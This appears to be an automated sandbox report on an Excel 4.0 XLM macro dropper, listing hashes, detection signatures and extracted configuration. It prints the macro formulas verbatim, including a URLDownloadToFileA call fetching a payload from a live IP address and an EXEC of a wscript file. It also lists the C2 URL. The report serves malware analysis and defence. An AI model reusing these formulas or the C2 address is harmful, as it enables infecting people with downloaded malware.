General

  • Target

    22524ecc99adf282778bb745f9efe38b

  • Size

    6KB

  • Sample

    231221-29hjgshgaq

  • MD5

    22524ecc99adf282778bb745f9efe38b

  • SHA1

    b3d52e7a57fe9ea91ecb8d304dfe3118cade9043

  • SHA256

    024d02eecaa32686b99822fa17a628c03c2337efdd5cbb84f120c7a199551b11

  • SHA512

    7247d3b7c7ed0c81b5c7c7b43bcbb062b16c10a2de3c1a0ed6980d40a2ddd3e516d44a30be43f280ecb015cf8163cc7e15de3d1542c42874f1f3891c4574b97f

  • SSDEEP

    192:NDSHuSxbrA2OmmfRs8UhHFBFYu6b98yiekV+E:N4uyM2w61FY7b98yivJ

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      22524ecc99adf282778bb745f9efe38b

    • Size

      6KB

    • MD5

      22524ecc99adf282778bb745f9efe38b

    • SHA1

      b3d52e7a57fe9ea91ecb8d304dfe3118cade9043

    • SHA256

      024d02eecaa32686b99822fa17a628c03c2337efdd5cbb84f120c7a199551b11

    • SHA512

      7247d3b7c7ed0c81b5c7c7b43bcbb062b16c10a2de3c1a0ed6980d40a2ddd3e516d44a30be43f280ecb015cf8163cc7e15de3d1542c42874f1f3891c4574b97f

    • SSDEEP

      192:NDSHuSxbrA2OmmfRs8UhHFBFYu6b98yiekV+E:N4uyM2w61FY7b98yivJ

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks